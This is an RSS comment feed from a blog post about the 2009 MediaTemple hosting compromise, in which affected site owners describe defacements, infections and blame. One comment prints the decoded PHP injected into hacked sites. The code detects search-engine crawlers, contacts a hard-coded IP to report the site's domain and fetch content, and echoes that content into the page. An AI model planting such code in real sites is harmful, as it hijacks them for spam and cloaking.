<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: MediaTemple/WordPress Hack</title>
	<atom:link href="http://adrian3.com/2009/11/mediatemplewordpress-hack/feed/" rel="self" type="application/rss+xml" />
	<link>http://adrian3.com/2009/11/mediatemplewordpress-hack/</link>
	<description>the blog of Adrian Hanft, III</description>
	<lastBuildDate>Fri, 30 Jul 2010 18:12:24 +0000</lastBuildDate>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
	<item>
		<title>By: Antonio</title>
		<link>http://adrian3.com/2009/11/mediatemplewordpress-hack/comment-page-1/#comment-373</link>
		<dc:creator>Antonio</dc:creator>
		<pubDate>Wed, 14 Jul 2010 10:01:18 +0000</pubDate>
		<guid isPermaLink="false">http://adrian3.com/?p=515#comment-373</guid>
		<description>Not alone. I had all my sites hacked as well by a turkish hacker named RD-Z3RO.

I had all my top domains defaced (joomla, wordpress and plain html sites, not only wordpress, so dont bother please with &quot;hard your wordpress installation&quot;).

The hacker did void the .htaccess and pulled in a index.html, a logo.ong and a flag.jpg file.

I searched thru the entire domains and it seems that nothing else has been touched, except for those strange guys in my wordpress users (johnnyA but others as well).

I spent half an hour to change ALL the passwords (root, ftp&#039;s, emails, databases) and reconfigure them all.

I have to be honest: it seems to be a breach in the server, not in the software. But i am waiting for Mediatemple to clarify.
I have to be honest</description>
		<content:encoded><![CDATA[<p>Not alone. I had all my sites hacked as well by a turkish hacker named RD-Z3RO.</p>
<p>I had all my top domains defaced (joomla, wordpress and plain html sites, not only wordpress, so dont bother please with &#8220;hard your wordpress installation&#8221;).</p>
<p>The hacker did void the .htaccess and pulled in a index.html, a logo.ong and a flag.jpg file.</p>
<p>I searched thru the entire domains and it seems that nothing else has been touched, except for those strange guys in my wordpress users (johnnyA but others as well).</p>
<p>I spent half an hour to change ALL the passwords (root, ftp&#8217;s, emails, databases) and reconfigure them all.</p>
<p>I have to be honest: it seems to be a breach in the server, not in the software. But i am waiting for Mediatemple to clarify.<br />
I have to be honest</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: ine</title>
		<link>http://adrian3.com/2009/11/mediatemplewordpress-hack/comment-page-1/#comment-368</link>
		<dc:creator>ine</dc:creator>
		<pubDate>Fri, 09 Jul 2010 18:27:43 +0000</pubDate>
		<guid isPermaLink="false">http://adrian3.com/?p=515#comment-368</guid>
		<description>i guess it happened again. while i was safe last time, this time about all my wordpress installs got hacked...
i&#039;m definitely not the only one.
their advise: reinstall.
can&#039;t believe it.</description>
		<content:encoded><![CDATA[<p>i guess it happened again. while i was safe last time, this time about all my wordpress installs got hacked&#8230;<br />
i&#8217;m definitely not the only one.<br />
their advise: reinstall.<br />
can&#8217;t believe it.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: John</title>
		<link>http://adrian3.com/2009/11/mediatemplewordpress-hack/comment-page-1/#comment-245</link>
		<dc:creator>John</dc:creator>
		<pubDate>Wed, 09 Dec 2009 17:50:24 +0000</pubDate>
		<guid isPermaLink="false">http://adrian3.com/?p=515#comment-245</guid>
		<description>Hi.  My Media Temple Wordpress site hacked as well.

Here is what I want to know, as this has never happened to me before and I am semi-computer illiterate:

Is my site dead and gone?  If not, how do I regain access to it.

I am also locked out of my FTP account.  I assume this is related.

Any help would be greatly appreciated.</description>
		<content:encoded><![CDATA[<p>Hi.  My Media Temple WordPress site hacked as well.</p>
<p>Here is what I want to know, as this has never happened to me before and I am semi-computer illiterate:</p>
<p>Is my site dead and gone?  If not, how do I regain access to it.</p>
<p>I am also locked out of my FTP account.  I assume this is related.</p>
<p>Any help would be greatly appreciated.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Tatiane</title>
		<link>http://adrian3.com/2009/11/mediatemplewordpress-hack/comment-page-1/#comment-244</link>
		<dc:creator>Tatiane</dc:creator>
		<pubDate>Tue, 01 Dec 2009 09:01:09 +0000</pubDate>
		<guid isPermaLink="false">http://adrian3.com/?p=515#comment-244</guid>
		<description>One of my clients&#039; MT account got hacked as well. I hope they fixed their holes because I have a bunch of clients hosted with them.</description>
		<content:encoded><![CDATA[<p>One of my clients&#8217; MT account got hacked as well. I hope they fixed their holes because I have a bunch of clients hosted with them.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Matt Jones</title>
		<link>http://adrian3.com/2009/11/mediatemplewordpress-hack/comment-page-1/#comment-239</link>
		<dc:creator>Matt Jones</dc:creator>
		<pubDate>Thu, 26 Nov 2009 22:13:30 +0000</pubDate>
		<guid isPermaLink="false">http://adrian3.com/?p=515#comment-239</guid>
		<description>Hey folks, if you didn&#039;t notice any changes to your sites, that means none of your files were affected. FTP passes were changed as a precautionary measure.

Lots of info can be found here:

http://weblog.mediatemple.net/weblog/category/system-incidents/1026-gs-security-advisory/

...with updates on the way. 

Matt (mt)</description>
		<content:encoded><![CDATA[<p>Hey folks, if you didn&#8217;t notice any changes to your sites, that means none of your files were affected. FTP passes were changed as a precautionary measure.</p>
<p>Lots of info can be found here:</p>
<p><a href="http://weblog.mediatemple.net/weblog/category/system-incidents/1026-gs-security-advisory/" rel="nofollow">http://weblog.mediatemple.net/weblog/category/system-incidents/1026-gs-security-advisory/</a></p>
<p>&#8230;with updates on the way. </p>
<p>Matt (mt)</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Michael VanDeMar</title>
		<link>http://adrian3.com/2009/11/mediatemplewordpress-hack/comment-page-1/#comment-238</link>
		<dc:creator>Michael VanDeMar</dc:creator>
		<pubDate>Thu, 26 Nov 2009 17:22:20 +0000</pubDate>
		<guid isPermaLink="false">http://adrian3.com/?p=515#comment-238</guid>
		<description>&lt;blockquote&gt;I am unsure who is actually to blame for this exploit, if anyone is. I heave read that MediaTemple blames Wordpress and Wordpress blames MediaTemple. There are reports that Drupal sites have also been exploited, so the problem isn’t limited to Wordpress only. Wordpress has released an update in the last week, but I don’t see any evidence that this issue was addressed in the latest security fix.&lt;/blockquote&gt;

This was not the fault of any software running on someone&#039;s account. From what I understand, mt stored everyones passwords in plain text (ie. human readable) in their database, and it was this database itself that got hacked. This allowed hackers direct access via ftp and ssh to all of their clients accounts.

http://michaeltorbert.com/blog/media-temple-hacked/

If you do a search on Twitter right now for mediatemple you can see all the people affected. As of right now, as far as I know, they have not issued any official statement on this, let alone an apology.</description>
		<content:encoded><![CDATA[<blockquote><p>I am unsure who is actually to blame for this exploit, if anyone is. I heave read that MediaTemple blames WordPress and WordPress blames MediaTemple. There are reports that Drupal sites have also been exploited, so the problem isn’t limited to WordPress only. WordPress has released an update in the last week, but I don’t see any evidence that this issue was addressed in the latest security fix.</p></blockquote>
<p>This was not the fault of any software running on someone&#8217;s account. From what I understand, mt stored everyones passwords in plain text (ie. human readable) in their database, and it was this database itself that got hacked. This allowed hackers direct access via ftp and ssh to all of their clients accounts.</p>
<p><a href="http://michaeltorbert.com/blog/media-temple-hacked/" rel="nofollow">http://michaeltorbert.com/blog/media-temple-hacked/</a></p>
<p>If you do a search on Twitter right now for mediatemple you can see all the people affected. As of right now, as far as I know, they have not issued any official statement on this, let alone an apology.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Kerri</title>
		<link>http://adrian3.com/2009/11/mediatemplewordpress-hack/comment-page-1/#comment-237</link>
		<dc:creator>Kerri</dc:creator>
		<pubDate>Wed, 25 Nov 2009 19:22:48 +0000</pubDate>
		<guid isPermaLink="false">http://adrian3.com/?p=515#comment-237</guid>
		<description>It&#039;s definitely not limited to Wordpress or other CMS sites.  One of my clients&#039; Media Temple sites was attacked.  It&#039;s a hand-built site, and the only PHP included are includes and some PHP to parse a static XML file.  There aren&#039;t even any forms.  If MT is trying to blame Wordpress for this, they&#039;re really off base.</description>
		<content:encoded><![CDATA[<p>It&#8217;s definitely not limited to WordPress or other CMS sites.  One of my clients&#8217; Media Temple sites was attacked.  It&#8217;s a hand-built site, and the only PHP included are includes and some PHP to parse a static XML file.  There aren&#8217;t even any forms.  If MT is trying to blame WordPress for this, they&#8217;re really off base.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Alex</title>
		<link>http://adrian3.com/2009/11/mediatemplewordpress-hack/comment-page-1/#comment-233</link>
		<dc:creator>Alex</dc:creator>
		<pubDate>Mon, 23 Nov 2009 20:36:42 +0000</pubDate>
		<guid isPermaLink="false">http://adrian3.com/?p=515#comment-233</guid>
		<description>Have a mediatempleaccount with several websites (several wordpress installations (not up to date) and a site hand coded) all were infected in the last week or so.</description>
		<content:encoded><![CDATA[<p>Have a mediatempleaccount with several websites (several wordpress installations (not up to date) and a site hand coded) all were infected in the last week or so.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: fwitz</title>
		<link>http://adrian3.com/2009/11/mediatemplewordpress-hack/comment-page-1/#comment-232</link>
		<dc:creator>fwitz</dc:creator>
		<pubDate>Mon, 23 Nov 2009 18:52:26 +0000</pubDate>
		<guid isPermaLink="false">http://adrian3.com/?p=515#comment-232</guid>
		<description>I got hacked too. MULTIPLE web sites on MULTIPLE MT accounts, but NONE of them had wordpress installed.

The encoded PHP evaluates to this:

if(stripos($_SERVER[&#039;HTTP_USER_AGENT&#039;], &#039;google&#039;) or stripos($_SERVER[&#039;HTTP_USER_AGENT&#039;], &#039;yahoo&#039;) or stripos($_SERVER[&#039;HTTP_USER_AGENT&#039;], &#039;msn&#039;) or stripos($_SERVER[&#039;HTTP_USER_AGENT&#039;], &#039;live&#039;))
{
  $r = &#039;&#039;;
  if($f=@fsockopen(&#039;91.207.4.18&#039;,80,$e,$er,10) and @fputs($f, &quot;GET /linkit/in.php?domain=&quot; . urlencode($_SERVER[&quot;SERVER_NAME&quot;]) . &quot;&amp;useragent=&quot; . urlencode($_SERVER[&#039;HTTP_USER_AGENT&#039;]) . &quot; HTTP/1.0\r\nHost: 91.207.4.18\r\n\r\n&quot;))
  while( $l = fread($f, 1024)) $r .= $l;
  @fclose($f);
  $p=strpos($r,&quot;\r\n\r\n&quot;); echo substr($r,$p+4);
}</description>
		<content:encoded><![CDATA[<p>I got hacked too. MULTIPLE web sites on MULTIPLE MT accounts, but NONE of them had wordpress installed.</p>
<p>The encoded PHP evaluates to this:</p>
<p>if(stripos($_SERVER['HTTP_USER_AGENT'], &#8216;google&#8217;) or stripos($_SERVER['HTTP_USER_AGENT'], &#8216;yahoo&#8217;) or stripos($_SERVER['HTTP_USER_AGENT'], &#8216;msn&#8217;) or stripos($_SERVER['HTTP_USER_AGENT'], &#8216;live&#8217;))<br />
{<br />
  $r = &#8221;;<br />
  if($f=@fsockopen(&#8217;91.207.4.18&#8242;,80,$e,$er,10) and @fputs($f, &#8220;GET /linkit/in.php?domain=&#8221; . urlencode($_SERVER["SERVER_NAME"]) . &#8220;&amp;useragent=&#8221; . urlencode($_SERVER['HTTP_USER_AGENT']) . &#8221; HTTP/1.0\r\nHost: 91.207.4.18\r\n\r\n&#8221;))<br />
  while( $l = fread($f, 1024)) $r .= $l;<br />
  @fclose($f);<br />
  $p=strpos($r,&#8221;\r\n\r\n&#8221;); echo substr($r,$p+4);<br />
}</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Matt</title>
		<link>http://adrian3.com/2009/11/mediatemplewordpress-hack/comment-page-1/#comment-228</link>
		<dc:creator>Matt</dc:creator>
		<pubDate>Wed, 18 Nov 2009 18:16:45 +0000</pubDate>
		<guid isPermaLink="false">http://adrian3.com/?p=515#comment-228</guid>
		<description>Hi, my (gs) account got hacked as well, and I can confirm that the hack is not confined to wp sites. I had a couple of wp sites and hand-built sites without any kind of cms/blogging backend on my (gs) account, and both types have been hacked by manipulating .htaccess and index.php. MediaTemple says that the ftp accounts got compromised, which I find a threadbare argument, as at least my ftp pw was 16+ chars long and QUITE hard to being brute-forced open. I hope that whatever back door the crackers used is closed by now.</description>
		<content:encoded><![CDATA[<p>Hi, my (gs) account got hacked as well, and I can confirm that the hack is not confined to wp sites. I had a couple of wp sites and hand-built sites without any kind of cms/blogging backend on my (gs) account, and both types have been hacked by manipulating .htaccess and index.php. MediaTemple says that the ftp accounts got compromised, which I find a threadbare argument, as at least my ftp pw was 16+ chars long and QUITE hard to being brute-forced open. I hope that whatever back door the crackers used is closed by now.</p>
]]></content:encoded>
	</item>
</channel>
</rss>
